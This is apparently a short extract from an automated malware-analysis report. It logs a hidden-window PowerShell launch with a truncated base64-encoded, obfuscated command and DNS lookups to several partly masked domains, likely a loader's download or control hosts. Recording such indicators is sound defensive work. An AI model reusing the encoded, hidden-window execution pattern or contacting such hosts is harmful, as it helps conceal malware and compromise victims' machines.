Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAUABuAG0AZgBhAHcAcgBlAG0AYQBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAE0AbwBqAGwAegB6AG0AYwBiAGYAdAB0ACAAIwA+ACAAJABGAG4AcwBrAHMAbAB4AHcAcQBjAHoAPQAnA...
- DNS ASK to####billiards.ca
- DNS ASK ho####earlane.com
- DNS ASK st####g.noc.com.sg
- DNS ASK te##.devel8.com
- DNS ASK ne#.######eticsliteracyproject.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAUABuAG0AZgBhAHcAcgBlAG0AYQBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAE0AbwBqAGwAegB6AG0AYwBiAGYAdAB0ACAAIwA+ACAAJABGAG4AcwBrAHMAbAB4AHcAcQBjAHoAPQAnA...' (with hidden window)